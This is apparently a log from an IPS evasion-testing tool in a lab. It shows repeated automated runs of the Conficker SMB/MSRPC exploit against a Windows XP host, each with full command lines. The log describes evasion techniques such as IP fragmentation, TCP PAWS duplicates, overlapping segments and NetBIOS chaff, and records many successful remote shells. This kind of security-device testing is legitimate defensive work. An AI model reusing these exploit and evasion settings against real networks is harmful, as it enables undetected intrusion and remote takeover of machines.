- Timed out (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=13639 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=QiqTvuFtUiA --evasion=[smb_opentree,end]ipv4_opt,"13","inc","alpharandomized" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed QiqTvuFtUiB
- The following evasions are applied from stage smb_opentree to end:
- - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has identical payload except that alphabetic characters are randomized
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Add a random alphanumeric urgent data byte to every 1 TCP segment.
- Info: NetBIOS connection 10.62.90.116:13639 -> 10.35.1.207:445
- Terminated
- ......
- 28150 runs averaging 1.76 runs / second ; progress: 15966/43200.......
- 28157 runs averaging 1.76 runs / second ; progress: 15971/43200.......
- 28164 runs averaging 1.76 runs / second ; progress: 15976/43200..........
- 28174 runs averaging 1.76 runs / second ; progress: 15981/43200..............
- 28188 runs averaging 1.76 runs / second ; progress: 15986/43200............2015-11-29 18:52:22 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43646 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=SZGGJgzT8+g --evasion=[start,smb_connect]tcp_paws,"8","1","shuffle30" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","268435455","random" --verifydelay=1000 --payload=shell
- Info: Using random seed SZGGJgzT8+h
- The following evasions are applied from stage start to smb_connect:
- - Every 8th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 1> and has 30 bytes of original payload, then shuffled original payload
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.116:43646 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .
- 28202 runs averaging 1.76 runs / second ; progress: 15991/43200...............
- 28217 runs averaging 1.76 runs / second ; progress: 15996/43200.2015-11-29 18:52:27 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=65461 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Msb/Ot5EHnw --evasion=[smb_openpipe,msrpc_req]ipv4_frag,"24" --evasion=[start,end]tcp_paws,"3","6","alpharandomized" --evasion=[smb_opentree,msrpc_bind]tcp_seg,"1" --verifydelay=1000 --payload=shell
- Info: Using random seed Msb/Ot5EHnw
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - TCP packets are segmented to contain at most 1 bytes of payload.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - IPv4 fragments with at most 24 bytes per fragment
- Info: NetBIOS connection 10.62.90.116:65461 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ............
- 28231 runs averaging 1.76 runs / second ; progress: 16001/43200..2015-11-29 18:52:34 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=38050 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=xGZ1/aGMnEk --evasion=[smb_openpipe,msrpc_bind]ipv4_frag,"1448" --evasion=[netbios_connect,msrpc_req]netbios_chaff,"50%","msrpc_req" --evasion=[netbios_connect,end]tcp_paws,"75%","4","shuffle" --verifydelay=1000 --payload=shell
- Info: Using random seed xGZ1/aGMnEn
- The following evasions are applied from stage netbios_connect to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has shuffled original payload
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - IPv4 fragments with at most 1448 bytes per fragment
- Info: NetBIOS connection 10.62.90.116:38050 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..
- 28236 runs averaging 1.76 runs / second ; progress: 16006/43200...
- 28239 runs averaging 1.76 runs / second ; progress: 16011/43200..........
- 28249 runs averaging 1.76 runs / second ; progress: 16016/43200.........
- 28258 runs averaging 1.76 runs / second ; progress: 16021/43200................
- 28274 runs averaging 1.76 runs / second ; progress: 16026/43200................
- 28290 runs averaging 1.76 runs / second ; progress: 16031/43200........
- 28298 runs averaging 1.76 runs / second ; progress: 16036/43200....Pid 9020 timed out - killed
- 2015-11-29 18:53:10 INFO
- Timed out (10.62.90.111):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33477 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=CHrh0o4+Eik --evasion=[start,smb_openpipe]tcp_paws,"75%","10","alpharandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"75%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed CHrh0o4+Eik
- The following evasions are applied from stage start to smb_openpipe:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 75% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.111:33477 -> 10.35.1.207:445
- Terminated
- .....
- 28308 runs averaging 1.76 runs / second ; progress: 16041/43200.........
- 28317 runs averaging 1.76 runs / second ; progress: 16046/43200.........
- 28326 runs averaging 1.76 runs / second ; progress: 16052/43200..........
- 28336 runs averaging 1.76 runs / second ; progress: 16057/43200......
- 28342 runs averaging 1.76 runs / second ; progress: 16062/43200.....
- 28347 runs averaging 1.76 runs / second ; progress: 16067/43200.........
- 28356 runs averaging 1.76 runs / second ; progress: 16072/43200...2015-11-29 18:53:44 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63149 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=Jl4yonimAlo --evasion=[smb_connect,msrpc_req]smb_decoytrees,"2","1","2","random_msrpcreq" --evasion=[start,end]tcp_paws,"75%","8","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed Jl4yonimAlo
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has 0x00 bytes as payload
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 2 SMB trees are opened and 1 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
- Info: NetBIOS connection 10.62.90.116:63149 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ........
- 28368 runs averaging 1.76 runs / second ; progress: 16077/432002015-11-29 18:53:47 INFO
- Success. (10.62.90.116):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=43826 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=PC0BS/oNbts --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","8","alpharandomized" --evasion=[msrpc_bind,msrpc_req]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
- Info: Using random seed PC0BS/oNbts
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has original payload with alphabetic bytes randomized
- The following evasions are applied from stage msrpc_bind to msrpc_req:
- - TCP timestamps echo reply value is sent in the wrong endianness
- Info: NetBIOS connection 10.62.90.116:43826 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ...........
- 28380 runs averaging 1.76 runs / second ; progress: 16082/43200..........
- 28390 runs averaging 1.76 runs / second ; progress: 16087/43200............
- 28402 runs averaging 1.77 runs / second ; progress: 16092/43200.......Pid 10253 timed out - killed
- 2015-11-29 18:54:05 INFO
- Timed out (10.62.90.113):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15281 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=oEsZ7fgDE68 --evasion=[start,smb_openpipe]ipv4_frag,"1472" --evasion=[smb_openpipe,msrpc_bind]tcp_urgent,"50%","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed oEsZ7fgDE6+
- The following evasions are applied from stage start to smb_openpipe:
- - IPv4 fragments with at most 1472 bytes per fragment
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - 50% probability to add a zero urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.113:15281 -> 10.35.1.207:445
- Terminated
- .......
- 28417 runs averaging 1.77 runs / second ; progress: 16097/43200....
- 28421 runs averaging 1.77 runs / second ; progress: 16102/43200......
- 28427 runs averaging 1.76 runs / second ; progress: 16107/43200....
- 28431 runs averaging 1.76 runs / second ; progress: 16112/43200....
- 28435 runs averaging 1.76 runs / second ; progress: 16117/43200.
- 28436 runs averaging 1.76 runs / second ; progress: 16122/43200.....
- 28441 runs averaging 1.76 runs / second ; progress: 16127/43200.......
- 28448 runs averaging 1.76 runs / second ; progress: 16132/43200.....
- 28453 runs averaging 1.76 runs / second ; progress: 16137/43200......
- 28459 runs averaging 1.76 runs / second ; progress: 16142/43200......
- 28465 runs averaging 1.76 runs / second ; progress: 16147/43200.............
- 28478 runs averaging 1.76 runs / second ; progress: 16152/43200..........
- 28488 runs averaging 1.76 runs / second ; progress: 16157/43200..........Pid 11292 timed out - killed
- 2015-11-29 18:55:12 INFO
- Timed out (10.62.90.117):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37589 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=/44Lb9fhL+E --evasion=[smb_connect,smb_opentree]smb_writeandxpad,"7","random_alphanum" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed /44Lb9fhL+H
- The following evasions are applied from stage smb_connect to smb_opentree:
- - 7 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Add a random alphaurgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.117:37589 -> 10.35.1.207:445
- Terminated
- 28499 runs averaging 1.76 runs / second ; progress: 16162/43200.....Pid 11315 timed out - killed
- 2015-11-29 18:55:14 INFO
- Timed out (10.62.90.112):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23858 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=TUOmd39n/3I --evasion=[smb_opentree,msrpc_bind]netbios_chaff,"13","empty_keepalive|small_unspec|http_get|msrpc_req|broken_length" --evasion=[smb_opentree,end]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
- Info: Using random seed TUOmd39n/3J
- The following evasions are applied from stage smb_opentree to end:
- - Add a random urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage smb_opentree to msrpc_bind:
- - Before every 13th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.112:23858 -> 10.35.1.207:445
- Terminated
- ........2015-11-29 18:55:17 INFO
- Success. (10.62.90.114):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34627 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=Fyro1IIugKo --evasion=[smb_openpipe,msrpc_bind]ipv4_opt,"2","inc","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_paws,"25%","10","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed Fyro1IIugKo
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 10> and has 0x00 bytes as payload
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - Every 2th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has random alphabetic bytes as payload
- Info: NetBIOS connection 10.62.90.114:34627 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...
- 28517 runs averaging 1.76 runs / second ; progress: 16167/43200................
- 28533 runs averaging 1.76 runs / second ; progress: 16172/43200........
- 28541 runs averaging 1.76 runs / second ; progress: 16177/43200...
- 28544 runs averaging 1.76 runs / second ; progress: 16182/43200...........
- 28555 runs averaging 1.76 runs / second ; progress: 16187/43200...................
- 28574 runs averaging 1.76 runs / second ; progress: 16192/43200.............
- 28587 runs averaging 1.76 runs / second ; progress: 16197/43200....
- 28591 runs averaging 1.76 runs / second ; progress: 16202/43200...........
- 28602 runs averaging 1.76 runs / second ; progress: 16207/43200......
- 28608 runs averaging 1.76 runs / second ; progress: 16212/43200.......Pid 11803 timed out - killed
- 2015-11-29 18:56:06 INFO
- Timed out (10.62.90.115):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=22964 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=LeqaqL5XwYM --evasion=[smb_connect,msrpc_req]tcp_segvar,"1","65535" --evasion=[smb_openpipe,end]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed LeqaqL5XwYM
- The following evasions are applied from stage smb_connect to msrpc_req:
- - TCP packets are segmented to contain between 1 and 65535 bytes of payload.
- The following evasions are applied from stage smb_openpipe to end:
- - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.115:22964 -> 10.35.1.207:445
- Terminated
- ......
- 28622 runs averaging 1.76 runs / second ; progress: 16217/43200.2015-11-29 18:56:09 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60975 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=ilnMy/qVBQY --evasion=[smb_opentree,end]smb_decoytrees,"5","3","7","random_msrpcreq" --evasion=[smb_openpipe,msrpc_req]tcp_overlap,"1245","new","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed ilnMy/qVBQa
- The following evasions are applied from stage smb_opentree to end:
- - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 7 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - TCP segments are set to overlap by 1245 bytes, with the later packet containing the correct payload. Overlapping part has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.115:60975 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ...........
- 28635 runs averaging 1.77 runs / second ; progress: 16222/43200..2015-11-29 18:56:14 INFO
- Success. (10.62.90.115):
- /root/evader/evader --uid=mongbat_7892_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31595 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=bktDO+ILREo --evasion=[netbios_connect,end]ipv4_frag,"40" --evasion=[smb_connect,end]smb_decoytrees,"3","1","3","random_msrpcreq" --evasion=[smb_openpipe,msrpc_req]smb_decoytrees,"2","4","1","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed bktDO+ILREp
- The following evasions are applied from stage netbios_connect to end:
- - IPv4 fragments with at most 40 bytes per fragment
- The following evasions are applied from stage smb_connect to end:
- - Before normal SMB writes, 3 SMB trees are opened and 1 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Before normal SMB writes, 2 SMB trees are opened and 4 writes are performed to them. The write payload is 1 random alphanumeric bytes.
- Info: NetBIOS connection 10.62.90.115:31595 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...........Interrupt registered, soft shutdown